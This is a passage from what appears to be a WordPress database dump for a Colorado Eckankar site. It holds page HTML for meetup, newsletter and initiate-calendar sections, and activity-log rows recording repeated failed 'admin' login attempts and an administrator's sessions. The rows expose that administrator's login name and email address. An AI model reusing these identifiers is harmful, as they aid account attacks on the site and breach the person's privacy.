src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(233511,39646,'_message_key','post_updated'),(233512,39646,'_user_id','2'),(233513,39646,'_user_login','S8zhaBda'),(233514,39646,'_user_email','nada@zipnadanot.org'),(233515,39646,'_server_remote_addr','76.130.120.x'),(233516,39646,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(233517,39647,'failed_username','admin'),(233518,39647,'server_http_user_agent','Mozilla/5.0'),(233519,39647,'_message_key','user_unknown_login_failed'),(233520,39647,'_server_remote_addr','20.38.42.x'),(233521,39648,'_user_id','2'),(233522,39648,'_user_login','S8zhaBda'),(233523,39648,'_user_email','nada@zipnadanot.org'),(233524,39648,'_message_key','user_logged_out'),(233525,39648,'_server_remote_addr','76.130.120.x'),(233526,39648,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?post_type=page'),(233527,39649,'failed_username','administrator'),(233528,39649,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0'),(233529,39649,'_message_key','user_unknown_login_failed'),(233530,39649,'_server_remote_addr','199.195.250.x'),(233531,39650,'failed_username','administrator'),(233532,39650,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4'),(233533,39650,'_message_key','user_unknown_login_failed'),(233534,39650,'_server_remote_addr','107.189.4.x'),(233535,39651,'failed_username','admin'),(233536,39651,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(233537,39651,'_message_key','user_unknown_login_failed'),(233538,39651,'_xmlrpc_request','true'),(233539,39651,'_server_remote_addr','20.163.19.x'),(233540,39652,'failed_username','admin'),(233541,39652,'server_http_user_agent','Mozilla/5.0'),(233542,39652,'_message_key','user_unknown_login_failed'),(233543,39652,'_server_remote_addr','20.38.42.x'),(233544,39653,'failed_username','admin'),(233545,39653,'server_http_user_agent','Mozilla/5.0'),(233546,39653,'_message_key','user_unknown_login_failed'),(233547,39653,'_server_remote_addr','20.38.42.x'),(233548,39654,'failed_username','admin'),(233549,39654,'server_http_user_agent','Mozilla/5.0'),(233550,39654,'_message_key','user_unknown_login_failed'),(233551,39654,'_server_remote_addr','20.38.42.x'),(233552,39655,'failed_username','admin'),(233553,39655,'server_http_user_agent','Mozilla/5.0'),(233554,39655,'_message_key','user_unknown_login_failed'),(233555,39655,'_server_remote_addr','20.38.42.x'),(233556,39656,'failed_username','admin'),(233557,39656,'server_http_user_agent','Mozilla/5.0'),(233558,39656,'_message_key','user_unknown_login_failed'),(233559,39656,'_server_remote_addr','20.38.42.x'),(233560,39657,'failed_username','admin'),(233561,39657,'server_http_user_agent','Mozilla/5.0'),(233562,39657,'_message_key','user_unknown_login_failed'),(233563,39657,'_server_remote_addr','20.38.42.x'),(233564,39658,'failed_username','admin'),(233565,39658,'server_http_user_agent','Mozilla/5.0'),(233566,39658,'_message_key','user_unknown_login_failed'),(233567,39658,'_server_remote_addr','20.38.42.x'),(233568,39659,'failed_username','admin'),(233569,39659,'server_http_user_agent','Mozilla/5.0'),(233570,39659,'_message_key','user_unknown_login_failed'),(233571,39659,'_server_remote_addr','20.38.42.x'),(233572,39660,'failed_username','admin'),(233573,39660,'server_http_user_agent','Mozilla/5.0'),(233574,39660,'_message_key','user_unknown_login_failed'),(233575,39660,'_server_remote_addr','20.38.42.x'),(233576,39661,'failed_username','admin'),(233577,39661,'server_http_user_agent','Mozilla/5.0'),(233578,39661,'_message_key','user_unknown_login_failed'),(233579,39661,'_server_remote_addr','20.38.42.x'),(233580,39662,'failed_username','admin'),(233581,39662,'server_http_user_agent','Mozilla/5.0'),(233582,39662,'_message_key','user_unknown_login_failed'),(233583,39662,'_server_remote_addr','20.38.42.x'),(233584,39663,'failed_username','admin'),(233585,39663,'server_http_user_agent','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(233586,39663,'_message_key','user_unknown_login_failed'),(233587,39663,'_server_remote_addr','45.61.184.x'),(233588,39664,'failed_username','admin'),(233589,39664,'server_http_user_agent','Mozilla/5.0'),(233590,39664,'_message_key','user_unknown_login_failed'),(233591,39664,'_server_remote_addr','20.38.42.x'),(233592,39665,'failed_username','admin'),(233593,39665,'server_http_user_agent','Mozilla/5.0'),(233594,39665,'_message_key','user_unknown_login_failed'),(233595,39665,'_server_remote_addr','20.38.42.x'),(233596,39666,'failed_username','admin'),(233597,39666,'server_http_user_agent','Mozilla/5.0'),(233598,39666,'_message_key','user_unknown_login_failed'),(233599,39666,'_server_remote_addr','20.38.42.x'),(233600,39667,'failed_username','admin'),(233601,39667,'server_http_user_agent','Mozilla/5.0'),(233602,39667,'_message_key','user_unknown_login_failed'),(233603,39667,'_server_remote_addr','20.38.42.x'),(233604,39668,'failed_username','admin'),(233605,39668,'server_http_user_agent','Mozilla/5.0'),(233606,39668,'_message_key','user_unknown_login_failed'),(233607,39668,'_server_remote_addr','20.38.42.x'),(233608,39669,'failed_username','administrator'),(233609,39669,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(233610,39669,'_message_key','user_unknown_login_failed'),(233611,39669,'_server_remote_addr','45.61.185.x'),(233612,39670,'failed_username','admin'),(233613,39670,'server_http_user_agent','Mozilla/5.0'),(233614,39670,'_message_key','user_unknown_login_failed'),(233615,39670,'_server_remote_addr','20.38.42.x'),(233616,39671,'failed_username','admin'),(233617,39671,'server_http_user_agent','Mozilla/5.0'),(233618,39671,'_message_key','user_unknown_login_failed'),(233619,39671,'_server_remote_addr','20.38.42.x'),(233620,39672,'failed_username','admin'),(233621,39672,'server_http_user_agent','Mozilla/5.0'),(233622,39672,'_message_key','user_unknown_login_failed'),(233623,39672,'_server_remote_addr','20.38.42.x'),(233624,39673,'failed_username','admin'),(233625,39673,'server_http_user_agent','Mozilla/5.0'),(233626,39673,'_message_key','user_unknown_login_failed'),(233627,39673,'_server_remote_addr','20.38.42.x'),(233628,39674,'plugin_name','WPCode Lite'),(233629,39674,'plugin_current_version','2.1.3.1'),(233630,39674,'plugin_new_version','2.1.4.1'),(233631,39674,'_message_key','plugin_update_available'),(233632,39674,'_server_remote_addr','173.231.231.x'),(233633,39675,'failed_username','admin'),(233634,39675,'server_http_user_agent','Mozilla/5.0'),(233635,39675,'_message_key','user_unknown_login_failed'),(233636,39675,'_server_remote_addr','20.38.42.x'),(233637,39676,'failed_username','admin'),(233638,39676,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0'),(233639,39676,'_message_key','user_unknown_login_failed'),(233640,39676,'_server_remote_addr','45.61.185.x'),(233641,39677,'failed_username','admin'),(233642,39677,'server_http_user_agent','Mozilla/5.0'),(233643,39677,'_message_key','user_unknown_login_failed'),(233644,39677,'_server_remote_addr','20.38.42.x'),(233645,39678,'failed_username','admin'),(233646,39678,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(233647,39678,'_message_key','user_unknown_login_failed'),(233648,39678,'_xmlrpc_request','true'),(233649,39678,'_server_remote_addr','20.38.46.x'),(233650,39679,'failed_username','admin'),(233651,39679,'server_http_user_agent','Mozilla/5.0'),(233652,39679,'_message_key','user_unknown_login_failed'),(233653,39679,'_server_remote_addr','20.38.42.x'),(233654,39680,'failed_username','admin'),(233655,39680,'server_http_user_agent','Mozilla/5.0'),(233656,39680,'_message_key','user_unknown_login_failed'),(233657,39680,'_server_remote_addr','20.38.42.x'),(233658,39681,'failed_username','admin'),(233659,39681,'server_http_user_agent','Mozilla/5.0'),(233660,39681,'_message_key','user_unknown_login_failed'),(233661,39681,'_server_remote_addr','20.38.42.x'),(233662,39682,'failed_username','admin'),(233663,39682,'server_http_user_agent','Mozilla/5.0'),(233664,39682,'_message_key','user_unknown_login_failed'),(233665,39682,'_server_remote_addr','20.38.42.x'),(233666,39683,'failed_username','administrator'),(233667,39683,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(233668,39683,'_message_key','user_unknown_login_failed'),(233669,39683,'_server_remote_addr','104.244.72.x'),(233670,39684,'failed_username','admin'),(233671,39684,'server_http_user_agent','Mozilla/5.0'),(233672,39684,'_message_key','user_unknown_login_failed'),(233673,39684,'_server_remote_addr','20.38.42.x'),(233674,39685,'failed_username','admin'),(233675,39685,'server_http_user_agent','Mozilla/5.0'),(233676,39685,'_message_key','user_unknown_login_failed'),(233677,39685,'_server_remote_addr','20.38.42.x'),(233678,39686,'failed_username','admin'),(233679,39686,'server_http_user_agent','Mozilla/5.0'),(233680,39686,'_message_key','user_unknown_login_failed'),(233681,39686,'_server_remote_addr','20.38.42.x'),(233682,39687,'failed_username','admin'),(233683,39687,'server_http_user_agent','Mozilla/5.0'),(233684,39687,'_message_key','user_unknown_login_failed'),(233685,39687,'_server_remote_addr','20.38.46.x'),(233686,39688,'failed_username','admin'),(233687,39688,'server_http_user_agent','Mozilla/5.0'),(233688,39688,'_message_key','user_unknown_login_failed'),(233689,39688,'_server_remote_addr','20.38.42.x'),(233690,39689,'failed_username','admin'),(233691,39689,'server_http_user_agent','Mozilla/5.0'),(233692,39689,'_message_key','user_unknown_login_failed'),(233693,39689,'_server_remote_addr','20.38.46.x'),(233694,39690,'failed_username','admin'),(233695,39690,'server_http_user_agent','Mozilla/5.0'),(233696,39690,'_message_key','user_unknown_login_failed'),(233697,39690,'_server_remote_addr','20.38.42.x'),(233698,39691,'failed_username','admin'),(233699,39691,'server_http_user_agent','Mozilla/5.0'),(233700,39691,'_message_key','user_unknown_login_failed'),(233701,39691,'_server_remote_addr','20.38.46.x'),(233702,39692,'failed_username','admin'),(233703,39692,'server_http_user_agent','Mozilla/5.0'),(233704,39692,'_message_key','user_unknown_login_failed'),(233705,39692,'_server_remote_addr','20.38.42.x'),(233706,39693,'failed_username','admin'),(233707,39693,'server_http_user_agent','Mozilla/5.0'),(233708,39693,'_message_key','user_unknown_login_failed'),(233709,39693,'_server_remote_addr','20.38.46.x'),(233710,39694,'failed_username','admin'),(233711,39694,'server_http_user_agent','Mozilla/5.0'),(233712,39694,'_message_key','user_unknown_login_failed'),(233713,39694,'_server_remote_addr','20.38.42.x'),(233714,39695,'failed_username','admin'),(233715,39695,'server_http_user_agent','Mozilla/5.0'),(233716,39695,'_message_key','user_unknown_login_failed'),(233717,39695,'_server_remote_addr','20.38.46.x'),(233718,39696,'failed_username','admin'),(233719,39696,'server_http_user_agent','Mozilla/5.0'),(233720,39696,'_message_key','user_unknown_login_failed'),(233721,39696,'_server_remote_addr','20.38.46.x'),(233722,39697,'failed_username','admin'),(233723,39697,'server_http_user_agent','Mozilla/5.0'),(233724,39697,'_message_key','user_unknown_login_failed'),(233725,39697,'_server_remote_addr','20.38.42.x'),(233726,39698,'failed_username','admin'),(233727,39698,'server_http_user_agent','Mozilla/5.0'),(233728,39698,'_message_key','user_unknown_login_failed'),(233729,39698,'_server_remote_addr','20.38.46.x'),(233730,39699,'failed_username','admin'),(233731,39699,'server_http_user_agent','Mozilla/5.0'),(233732,39699,'_message_key','user_unknown_login_failed'),(233733,39699,'_server_remote_addr','20.38.42.x'),(233734,39700,'failed_username','admin'),(233735,39700,'server_http_user_agent','Mozilla/5.0'),(233736,39700,'_message_key','user_unknown_login_failed'),(233737,39700,'_server_remote_addr','20.38.46.x'),(233738,39701,'failed_username','admin'),(233739,39701,'server_http_user_agent','Mozilla/5.0'),(233740,39701,'_message_key','user_unknown_login_failed'),(233741,39701,'_server_remote_addr','20.38.42.x'),(233742,39702,'failed_username','admin'),(233743,39702,'server_http_user_agent','Mozilla/5.0'),(233744,39702,'_message_key','user_unknown_login_failed'),(233745,39702,'_server_remote_addr','20.38.46.x'),(233746,39703,'failed_username','admin'),(233747,39703,'server_http_user_agent','Mozilla/5.0'),(233748,39703,'_message_key','user_unknown_login_failed'),(233749,39703,'_server_remote_addr','20.38.42.x'),(233750,39704,'failed_username','admin'),(233751,39704,'server_http_user_agent','Mozilla/5.0'),(233752,39704,'_message_key','user_unknown_login_failed'),(233753,39704,'_server_remote_addr','20.38.46.x'),(233754,39705,'failed_username','admin'),(233755,39705,'server_http_user_agent','Mozilla/5.0'),(233756,39705,'_message_key','user_unknown_login_failed'),(233757,39705,'_server_remote_addr','20.38.42.x'),(233758,39706,'failed_username','admin'),(233759,39706,'server_http_user_agent','Mozilla/5.0'),(233760,39706,'_message_key','user_unknown_login_failed'),(233761,39706,'_server_remote_addr','20.38.46.x'),(233762,39707,'failed_username','admin'),(233763,39707,'server_http_user_agent','Mozilla/5.0'),(233764,39707,'_message_key','user_unknown_login_failed'),(233765,39707,'_server_remote_addr','20.38.46.x'),(233766,39708,'failed_username','admin'),(233767,39708,'server_http_user_agent','Mozilla/5.0'),(233768,39708,'_message_key','user_unknown_login_failed'),(233769,39708,'_server_remote_addr','20.38.46.x'),(233770,39709,'failed_username','admin'),(233771,39709,'server_http_user_agent','Mozilla/5.0'),(233772,39709,'_message_key','user_unknown_login_failed'),(233773,39709,'_server_remote_addr','20.38.46.x'),(233774,39710,'failed_username','admin'),(233775,39710,'server_http_user_agent','Mozilla/5.0'),(233776,39710,'_message_key','user_unknown_login_failed'),(233777,39710,'_server_remote_addr','20.38.46.x'),(233778,39711,'failed_username','admin'),(233779,39711,'server_http_user_agent','Mozilla/5.0'),(233780,39711,'_message_key','user_unknown_login_failed'),(233781,39711,'_server_remote_addr','20.38.46.x'),(233782,39712,'failed_username','admin'),(233783,39712,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(233784,39712,'_message_key','user_unknown_login_failed'),(233785,39712,'_xmlrpc_request','true'),(233786,39712,'_server_remote_addr','20.84.106.x'),(233787,39713,'failed_username','admin'),(233788,39713,'server_http_user_agent','Mozilla/5.0'),(233789,39713,'_message_key','user_unknown_login_failed'),(233790,39713,'_server_remote_addr','20.38.46.x'),(233791,39714,'failed_username','admin'),(233792,39714,'server_http_user_agent','Mozilla/5.0'),(233793,39714,'_message_key','user_unknown_login_failed'),(233794,39714,'_server_remote_addr','20.38.46.x'),(233795,39715,'failed_username','admin'),(233796,39715,'server_http_user_agent','Mozilla/5.0'),(233797,39715,'_message_key','user_unknown_login_failed'),(233798,39715,'_server_remote_addr','20.38.46.x'),(233799,39716,'failed_username','admin'),(233800,39716,'server_http_user_agent','Mozilla/5.0'),(233801,39716,'_message_key','user_unknown_login_failed'),(233802,39716,'_server_remote_addr','20.38.46.x'),(233803,39717,'failed_username','admin'),(233804,39717,'server_http_user_agent','Mozilla/5.0'),(233805,39717,'_message_key','user_unknown_login_failed'),(233806,39717,'_server_remote_addr','20.38.46.x'),(233807,39718,'failed_username','admin'),(233808,39718,'server_http_user_agent','Mozilla/5.0'),(233809,39718,'_message_key','user_unknown_login_failed'),(233810,39718,'_server_remote_addr','20.38.46.x'),(233811,39719,'failed_username','admin'),(233812,39719,'server_http_user_agent','Mozilla/5.0'),(233813,39719,'_message_key','user_unknown_login_failed'),(233814,39719,'_server_remote_addr','20.38.46.x'),(233815,39720,'failed_username','admin'),(233816,39720,'server_http_user_agent','Mozilla/5.0'),(233817,39720,'_message_key','user_unknown_login_failed'),(233818,39720,'_server_remote_addr','20.38.46.x'),(233819,39721,'user_id','2'),(233820,39721,'user_email','nada@zipnadanot.org'),(233821,39721,'user_login','S8zhaBda'),(233822,39721,'_user_id','2'),(233823,39721,'_user_login','S8zhaBda'),(233824,39721,'_user_email','nada@zipnadanot.org'),(233825,39721,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(233826,39721,'_message_key','user_logged_in'),(233827,39721,'_server_remote_addr','76.130.120.x'),(233828,39721,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(233829,39722,'post_id','68102'),(233830,39722,'post_type','page'),(233831,39722,'post_title','Initiate Page'),(233832,39722,'post_prev_post_content','<div class=\"tmpl-call_to_action-12 boldgrid-section dynamic-gridblock background-fixed\" style=\"color: #1d1d1d; box-shadow: #cecece 0px 0px 0px 0px inset; background-image: linear-gradient(to left, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.18)), url(\'https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/tree-path-5.jpg\" data-bg-overlaycolor=\"rgba(255,255,255,0.18)\" data-bg-overlaycolor-alpha=\"0.18\" data-bg-overlaycolor-class=\"1\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 75px; padding-bottom: 300px;\">\r\n<div class=\"col-lg-3 col-md-12 col-sm-12 col-xs-12\"></div>\r\n<div class=\"col-md-8 col-sm-10 col-xs-12 text-center col-lg-6\" style=\"text-align: left; padding: 0em; background-color: rgba(255, 255, 255, 0); box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<blockquote class=\"color1-border-color\" style=\"margin: 52px 16px 20px auto; border-style: none; border-width: 0px; color: #585858; padding: 0em 2em 1em 5%; border-radius: 8px; background-color: none; width: 100%;\">\r\n<h1 class=\"\" style=\"text-transform: capitalize; font-size: 106px; letter-spacing: 2px; margin-top: 52px; box-shadow: #cecece 0px 0px 0px 0px; padding-left: 0em; margin-left: auto; margin-right: auto; text-align: center; width: auto; font-family: \'Alegreya SC\'; font-weight: 400; line-height: 89px; text-shadow: #ffffff 0px 0px 56px; color: #ad7a05;\" data-font-family=\"Alegreya SC\" data-font-weight=\"400\" data-font-style=\"\">Initiate Pages</h1>\r\n</blockquote>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-12\" style=\"padding: 2em; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px -1px, rgba(0, 0, 0, 0.06) 0px 2px 4px -1px;\">\r\n<p class=\"\" style=\"font-size: 24px; font-family: Raleway; font-weight: 400;\" data-font-family=\"Raleway\" data-font-weight=\"400\" data-font-style=\"\">These pages are for those who have enrolled in Eckankar’s Spiritual Living Courses.<br>\r\nAll are welcome to explore the benefits of the ECK courses and initiation&nbsp;<a href=\"https://www.eckankar.org/engage/advanced-spiritual-living/eck-initations/\" target=\"_blank\" rel=\"noopener\">here</a>.</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-14 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 64px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<p class=\"\" style=\"text-align: center; font-size: 27px; text-transform: capitalize; font-family: Raleway; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px; padding-bottom: 1em; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">INITIATE EVENT CALENDARS</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 54px; background-color: #ffffff;\">\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Central Colorado</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205232 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2019/12/eck-temple-member-cal-promo.jpg\" alt=\"Clear mountain stream with driftwood near the shore\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/central-colorado-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\" data-bg-color-1=\"rgb(41, 100, 219)\" data-bg-color-2=\"rgb(255, 255, 255)\" data-bg-direction=\"to bottom\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">colorado springs</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-252359 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/cosprings-member-cal-promo.jpg\" alt=\"\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/colorado-springs-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">loveland</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/loveland-member-cal-promo.jpg\" alt=\"Green meadow overlooking mountains with clouds in the background\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/loveland-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n<div class=\"col-md-3 col-sm-4 col-xs-12 text-center col-lg-3\">\r\n<h4 class=\"\" style=\"text-transform: uppercase; font-family: \'Open Sans\'; font-weight: 500; letter-spacing: 0px;\" data-font-family=\"Open Sans\" data-font-weight=\"500\" data-font-style=\"\">Mountain Areas</h4>\r\n<p class=\"\" style=\"margin-right: -15px; margin-left: -15px;\"><img class=\"bg-img alignnone wp-image-205233 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/mountain-area-member-cal-promo.jpg\" alt=\"Fall foliage and a mountain stream\" width=\"411\" height=\"231\"></p>\r\n<p class=\"wow headShake\" style=\"margin-top: -50px; text-align: center;\" data-wow-duration=\"1s\" data-wow-delay=\"1s\"><a class=\"color1-background-color color-3-text-contrast bg-background-color btn btn-rounded btn-regular\" href=\"https://eckankar-colorado.org/mountain-area-member-calendar-mec/\">Go Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-10 boldgrid-section dynamic-gridblock background-parallax\" style=\"color: #1d1d1d; background-position: 50% 50%; background-size: cover; background-color: #f5f2eb;\" data-bg-overlaycolor=\"rgba(255, 255, 255, 0.8)\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 0px;\">\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n<div class=\"col-md-10 col-sm-8 col-xs-12 text-center col-lg-10\" style=\"padding: 2em;\">\r\n<p class=\"h3\" style=\"font-weight: 600; margin-top: 20px; margin-bottom: 20px; font-family: Raleway; font-size: 24px; text-transform: none; font-style: italic; border-width: 0px; color: #3e3e3e;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"italic\"><i class=\"fa bg-inserted-icon fa-quote-left\" style=\"font-size: 35px; box-shadow: #cecece 0px 0px 0px 0px inset; color: #d5b56b;\" aria-hidden=\"true\">&nbsp;&nbsp; </i>We are personally responsible for our own state of consciousness. As Soul unfolds toward total freedom, It understands total responsibility must be accepted for every thought and action.&nbsp;&nbsp;</p>\r\n<h4 class=\"color3-color bg-font-family-alt\" style=\"text-transform: capitalize;\">—Harold Klemp</h4>\r\n<p class=\"\"><em><a class=\"bg-font-family-alt\" href=\"http://www.eckbooks.org/items/The_Language_of_Soul-943-6.html\" target=\"_blank\" rel=\"noopener noreferrer\">The Language of Soul</a></em></p>\r\n</div>\r\n<div class=\"col-md-1 col-sm-2 col-xs-12 col-lg-1\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-testimonial-3 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container-fluid\">\r\n<div class=\"row\" style=\"padding-top: 24px; padding-bottom: 26px;\">\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Colorado State<br>\r\nRESA Structure</p>\r\n<div class=\"row\" style=\"box-shadow: #cecece 0px 0px 0px 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div class=\"\" style=\"padding: 15px 10px; border-top: 10px solid #d5b56b; margin-bottom: 20px; box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px;\">\r\n<p class=\"\" style=\"font-size: 18px;\">How does the Colorado RESA structure work? Check the chart or FAQ to get a quick overview.<br>\r\n<br>\r\n<a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/wp-content/uploads/2023/07/RESA-Org-Chart-5.13.23.pdf\">Org Chart </a>/ <a class=\"\" style=\"font-size: 18px;\" href=\"https://eckankar-colorado.org/resa-faq/\" target=\"_blank\" rel=\"noopener\">RESA FAQ</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-3 col-sm-6 col-xs-12 text-center col-lg-3\">\r\n<p class=\"mod-reset\">&nbsp;</p>\r\n<p class=\"h3\" style=\"text-transform: capitalize; font-size: 25px; padding-bottom: 8px; font-family: Raleway; font-weight: 500; color: #ad7a05;\" data-font-family=\"Raleway\" data-font-weight=\"500\" 